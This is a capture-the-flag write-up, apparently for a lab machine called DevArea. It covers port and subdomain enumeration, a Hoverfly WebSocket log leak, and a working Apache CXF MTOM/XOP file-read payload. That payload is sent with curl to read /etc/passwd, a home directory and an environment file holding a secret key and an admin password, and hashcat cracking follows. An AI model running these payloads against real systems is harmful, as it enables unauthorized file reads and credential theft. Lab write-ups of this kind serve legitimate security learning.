Preview
← BACK

DevArea

Recon

IP=10.129.25.138
nmap -Pn -p- -T4 -vv -oG nmap.grep $IP; nmap -sVC -Pn -p$(grep -oP '\d+(?=/open)' nmap.grep | paste -sd "," -) $IP; 
Starting Nmap 7.93 ( https://nmap.org ) at 2026-03-31 20:17 CEST
Nmap scan report for devarea.htb (10.129.25.138)
Host is up (0.033s latency).

PORT     STATE SERVICE VERSION
21/tcp   open  ftp     vsftpd 3.0.5
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxr-xr-x    2 ftp      ftp          4096 Sep 22  2025 pub
| ftp-syst:
|   STAT:
| FTP server status:
|      Connected to ::ffff:10.10.15.144
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 4
|      vsFTPd 3.0.5 - secure, fast, stable
|_End of status
22/tcp   open  ssh     OpenSSH 9.6p1 Ubuntu 3ubuntu13.15 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   256 83136ba19b28fdbd5d2bee03be9c8d82 (ECDSA)
|_  256 0a86fa65d120b43a5713d11ac2de5278 (ED25519)
80/tcp   open  http    Apache httpd 2.4.58
|_http-server-header: Apache/2.4.58 (Ubuntu)
|_http-title: DevArea - Connect with Top Development Talent
8080/tcp open  http    Jetty 9.4.27.v20200227
|_http-title: Error 404 Not Found
|_http-server-header: Jetty(9.4.27.v20200227)
8500/tcp open  fmtp?
| fingerprint-strings:
|   FourOhFourRequest:
|     HTTP/1.0 500 Internal Server Error
|     Content-Type: text/plain; charset=utf-8
|     X-Content-Type-Options: nosniff
|     Date: Tue, 31 Mar 2026 18:18:31 GMT
|     Content-Length: 64
|     This is a proxy server. Does not respond to non-proxy requests.
|   GenericLines, Help, Kerberos, RTSPRequest, SSLSessionReq, TLSSessionReq, TerminalServerCookie:
|     HTTP/1.1 400 Bad Request
|     Content-Type: text/plain; charset=utf-8
|     Connection: close
|     Request
|   GetRequest, HTTPOptions:
|     HTTP/1.0 500 Internal Server Error
|     Content-Type: text/plain; charset=utf-8
|     X-Content-Type-Options: nosniff
|     Date: Tue, 31 Mar 2026 18:18:05 GMT
|     Content-Length: 64
|_    This is a proxy server. Does not respond to non-proxy requests.
8888/tcp open  http    Golang net/http server (Go-IPFS json-rpc or InfluxDB API)
|_http-title: Hoverfly Dashboard
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
<SNIP>
Service Info: Host: _; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 90.67 seconds

nmap -sU --min-rate=5000 -p- $IP

nxc smb "$IP" -u '' -p '' --generate-hosts-file /tmp/hosts; cat /tmp/hosts >> /etc/hosts

Service Enumeration

###

ffuf -c -w `fzf-wordlists` -u "http://devarea.htb/" -H "Host: FUZZ.devarea.htb" -r -fs 22211

        /'___\  /'___\           /'___\
       /\ \__/ /\ \__/  __  __  /\ \__/
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
         \ \_\   \ \_\  \ \____/  \ \_\
          \/_/    \/_/   \/___/    \/_/

       v2.1.0
________________________________________________

 :: Method           : GET
 :: URL              : http://devarea.htb/
 :: Wordlist         : FUZZ: /opt/lists/seclists/Discovery/DNS/subdomains-top1million-5000.txt
 :: Header           : Host: FUZZ.devarea.htb
 :: Follow redirects : true
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
 :: Filter           : Response size: 22211
________________________________________________

:: Progress: [4989/4989] :: Job [1/1] :: 589 req/sec :: Duration: [0:00:09] :: Errors: 0 ::


ffuf -c -w `fzf-wordlists` -u "http://devarea.htb/FUZZ"

 :: Wordlist         : FUZZ: /opt/lists/seclists/Discovery/Web-Content/common.txt
________________________________________________

.hta                    [Status: 403, Size: 276, Words: 20, Lines: 10, Duration: 41ms]
.htpasswd               [Status: 403, Size: 276, Words: 20, Lines: 10, Duration: 42ms]
.htaccess               [Status: 403, Size: 276, Words: 20, Lines: 10, Duration: 43ms]
assets                  [Status: 301, Size: 311, Words: 20, Lines: 10, Duration: 33ms]
index                   [Status: 200, Size: 22211, Words: 9908, Lines: 475, Duration: 33ms]
index.html              [Status: 200, Size: 22211, Words: 9908, Lines: 475, Duration: 32ms]
server-status           [Status: 403, Size: 276, Words: 20, Lines: 10, Duration: 31ms]
:: Progress: [4750/4750] :: Job [1/1] :: 1190 req/sec :: Duration: [0:00:04] :: Errors: 0 ::

CVE-2025-54376 - WebSocket endpoint reachable without authentication

Horsefly is running on tpc/8888 though it requires a login. Looking at the github repo we see 4 security advisories, one of them explain a simple logs leak through the websocket endpoint:

wscat -c ws://devarea.htb:8888/api/v2/ws/logs
Connected (press CTRL+C to quit)
> 1
< {"logs":[{"host":"0.0.0.0","level":"info","msg":"Listen on specific interface","time":"2026-03-31T09:03:24Z"},{"level":"info","msg":"Using memory backend","time":"2026-03-31T09:03:24Z"},{"level":"info","msg":"User added successfully","time":"2026-03-31T09:03:25Z","username":"admin"},{"level":"info","msg":"Enabling proxy authentication","time":"2026-03-31T09:03:25Z"},{"Destination":".","Mode":"simulate","ProxyPort":"8500","level":"info","msg":"Proxy prepared...","time":"2026-03-31T09:03:25Z"},{"destination":".","level":"info","mode":"simulate","msg":"current proxy configuration","port":"8500","time":"2026-03-31T09:03:25Z"},{"level":"info","msg":"serving proxy","time":"2026-03-31T09:03:25Z"},{"AdminPort":"8888","level":"info","msg":"Admin interface is starting...","time":"2026-03-31T09:03:25Z"},{"error":{},"level":"error","msg":"failed to upgrade websocket","time":"2026-03-31T19:29:38Z"}]}

We have a username admin

CVE-2022-46364 - SSRF through a vulnerable Apache CXF endpoint

Looking at the FTP we find a jar:

ftp devarea.htb
# Connected to devarea.htb.
# 220 (vsFTPd 3.0.5)
# Name (devarea.htb:root): Anonymous
# 230 Login successful.
# Remote system type is UNIX.
# Using binary mode to transfer files.
ftp> ls
# 229 Entering Extended Passive Mode (|||48588|)
# 150 Here comes the directory listing.
# drwxr-xr-x    2 ftp      ftp          4096 Sep 22  2025 pub
# 226 Directory send OK.
ftp> cd pub
# 250 Directory successfully changed.
ftp> ls
# 229 Entering Extended Passive Mode (|||42029|)
# 150 Here comes the directory listing.
# -rw-r--r--    1 ftp      ftp       6445030 Sep 22  2025 employee-service.jar
# 226 Directory send OK.
ftp> get employee-service.jar
# local: employee-service.jar remote: employee-service.jar
# 229 Entering Extended Passive Mode (|||43773|)
# 150 Opening BINARY mode data connection for employee-service.jar (6445030 bytes).
# 100% |****************************************************|  6293 KiB    3.95 MiB/s    00:00 ETA
# 226 Transfer complete.
# 6445030 bytes received in 00:01 (3.87 MiB/s)
ftp> exit
# 221 Goodbye.

Decompiling it we find a couple interesting things, there's a service running on tcp/8080 at /employeeservice we can send a SOAP request with information and get a reflection of data on the DOM. We might be able to abuse this.

The code creates a factory using org.apache.cxf.jaxws.JaxWsServerFactoryBean which is vulnerable to CVE-2022-46364. An SSRF in Apache CXF, It's a bit complicated to setup, the syntax is really heavy, it's MTOM/SOAP, and there's no clear POC online, so I kind of had to glue everything I found online together, here are the resources I used:

So at first I wanted a valid SOAP request and see the message from the sources appear:

<?xml version="1.0" encoding="UTF-8"?>
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:tns="http://devarea.htb/">
  <soapenv:Header/>
  <soapenv:Body>
    <tns:submitReport>
      <arg0>
        <confidential>false</confidential>
        <content>test</content>
        <department>test</department>
        <employeeName>test</employeeName>
      </arg0>
    </tns:submitReport>
  </soapenv:Body>
</soapenv:Envelope>

I saved that to a xml file and sent it with curl:

cat payload.xml | curl -X POST http://10.129.25.138:8080/employeeservice -H "Content-Type: text/xml" -d @-
# <soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><ns2:submitReportResponse xmlns:ns2="http://devarea.htb/"><return>Report received from test. Department: test. Content: test</return></ns2:submitReportResponse></soap:Body></soap:Envelope>

Perfect, now the idea comes from the Snyk advisory they boiled down the POC to a simple one-liner, which is missing a lot of context but it's worth a shot, let's use employeeName we replace it with this:

<employeeName><xop:Include href="file:///etc/passwd" xmlns:xop="http://www.w3.org/2004/08/xop/include" /></employeeName>

Their example doesn't show file:///etc/passwd but since it's SSRF it should work, if not we can also try fetching data from the other sites.

cat payload.xml | curl -X POST http://10.129.25.138:8080/employeeservice -H "Content-Type: text/xml" -d @-
# <soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Client</faultcode><faultstring>Unmarshalling Error: unexpected element (uri:"http://www.w3.org/2004/08/xop/include", local:"Include"). Expected elements are (none) </faultstring></soap:Fault></soap:Body></soap:Envelope>

Weird error, looking online I realized that this is because it's not simple SOAP, it uses MTOM/SOAP which requires an even heavier syntax, I found a blog that explains how to deal with this horror, the idea is to send a multipart/related request instead, and just add the boundaries and specify the typing to prevent issues.

--boundary
Content-Type: text/xml; charset=UTF-8"

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:tns="http://devarea.htb/">
  <soapenv:Header/>
  <soapenv:Body>
    <tns:submitReport>
      <arg0>
        <confidential>false</confidential>
        <content>test</content>
        <department>test</department>
        <employeeName><xop:Include href="file:///etc/passwd" xmlns:xop="http://www.w3.org/2004/08/xop/include" /></employeeName>
      </arg0>
    </tns:submitReport>
  </soapenv:Body>
</soapenv:Envelope>
--boundary--

Then the curl looks like this:

cat payload.txt | curl -X POST http://10.129.25.138:8080/employeeservice -H 'Content-Type: multipart/related; boundary="boundary"' --data-binary @-
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><ns2:submitReportResponse xmlns:ns2="http://devarea.htb/"><return>Report received from cm9vdDp4OjA6MDpyb290Oi9yb290Oi9iaW4vYmFzaApkYWVtb246eDoxOjE6ZGFlbW9uOi91c <SNIP>

Decoding the base64 blob we get:

grep "sh$" passwd
# root:x:0:0:root:/root:/bin/bash
# dev_ryan:x:1001:1001::/home/dev_ryan:/bin/bash

We got a new user, though I blidnly tried to fetch the /home/dev_ryan/flag.txt file but it failed, probably some permission issue, though thankfully we should be able to have directory listings, let's try to look at ryan's home directory, we can do some bash magic to get the listing clean:

cat payload.txt | curl -X POST http://10.129.25.138:8080/employeeservice -H 'Content-Type: multipart/related; boundary="boundary"' --data-binary @- -s | cut -d' ' -f 6 | sed 's/.$//' | base64 -d
.bash_history
.bash_logout
.bashrc
.cache
.local
.profile
.ssh
syswatch-v1.zip
user.txt

.ssh is empty, .bash_history is probably voided as well I don't see anything, the syswatch-v1.zip seems interesting though it's probably useful for later, let's focus on finding credentials or a way to get a shell:

cat payload.txt | curl -X POST http://10.129.25.138:8080/employeeservice -H 'Content-Type: multipart/related; boundary="boundary"' --data-binary @- -s | cut -d' ' -f 6 | sed 's/.$//' | base64 -d | strings -n 10 > syswatch.zip

unzip looking through it found db with hash, tried to parse hash but didnt work, looking further found credentials.


SALT=$(echo -n "IyKfiteB3TNFK6Hv" | base64 -w 0)
HASH=$(echo -n "a0fbf5283db6a13859776827133e99d4d5ab43e85bedd05b06119e6fdca096ac81570d4497a836d09a155884182b6442cfcf6986b96310b514f34d9da871cb70" | xxd -r -p | base64 -w 0)
echo "SCRYPT:32768:8:$SALT:$HASH" > hash.txt
hashcat -m 8900 hash.txt `fzf-wordlists`
hashcat (v6.2.6) starting

<SNIP>

No hashes loaded

I'm following the example from hashcat_examples to the letter, but it's not working. Looking around the files again there's this curious line:

grep -r password
# syswatch_gui/app.py:            cur.execute("INSERT INTO users(username, password_hash) VALUES(?, ?)", ("admin", generate_password_hash(pwd)))

Looking at app.py we see that pwd comes from SYSWATCH_ADMIN_PASSWORD env variable, let's look for that now:

grep -r "SYSWATCH_ADMIN_PASSWORD"
# syswatch/syswatch/setup.sh:ADMIN="${SYSWATCH_ADMIN_PASSWORD:-}"
# syswatch/syswatch/setup.sh:SYSWATCH_ADMIN_PASSWORD=$ADMIN
# syswatch/syswatch/syswatch_gui/templates/docs.html:        <li>SYSWATCH_ADMIN_PASSWORD</li>
# syswatch/syswatch/syswatch_gui/app.py:        pwd = os.environ.get("SYSWATCH_ADMIN_PASSWORD")

Looking at the setup.sh it's pretty messy but inside we see a reference to a env file and the password!

"$OPT_DIR/venv/bin/pip" install --upgrade pip
"$OPT_DIR/venv/bin/pip" install -r "$OPT_DIR/syswatch_gui/requirements.txt"
ENV_FILE="/etc/syswatch.env"
SECRET="${SYSWATCH_SECRET_KEY:-}"
ADMIN="${SYSWATCH_ADMIN_PASSWORD:-}"
if [ -z "$SECRET" ]; then
  if command -v openssl >/dev/null 2>&1; then
    SECRET="$(openssl rand -hex 32)"
  else
    SECRET="$(head -c 32 /dev/urandom | xxd -p)"
  fi
fi
[ -z "$ADMIN" ] && ADMIN="SyswatchAdmin2026"
cat > "$ENV_FILE" <<EOF
SYSWATCH_SECRET_KEY=$SECRET
SYSWATCH_ADMIN_PASSWORD=$ADMIN
SYSWATCH_LOG_DIR=$OPT_DIR/logs
SYSWATCH_DB_PATH=$OPT_DIR/syswatch_gui/syswatch.db
SYSWATCH_PLUGIN_DIR=$OPT_DIR/plugins
SYSWATCH_BACKUP_DIR=$OPT_DIR/backup
SYSWATCH_VERSION=1.0.0

Let's still look at /etc/syswatch.env just in case:

cat payload.txt | curl -X POST http://10.129.25.138:8080/employeeservice -H 'Content-Type: multipart/related; boundary="boundary"' --data-binary @- -s | cut -d' ' -f 6 | sed 's/.$//' | base64 -d
SYSWATCH_SECRET_KEY=f3ac48a6006a13a37ab8da0ab0f2a3200d8b3640431efe440788beaefa236725
SYSWATCH_ADMIN_PASSWORD=SyswatchAdmin2026
SYSWATCH_LOG_DIR=/opt/syswatch/logs
SYSWATCH_DB_PATH=/opt/syswatch/syswatch_gui/syswatch.db
SYSWATCH_PLUGIN_DIR=/opt/syswatch/plugins
SYSWATCH_BACKUP_DIR=/opt/syswatch/backup
SYSWATCH_VERSION=1.0.0

These creds are for syswatch, but tcp/5000 is not forwarded or idk, try to access maybe through proxy?

There's a stupid RCE in /api/v2/hoverfly/middleware while authenticate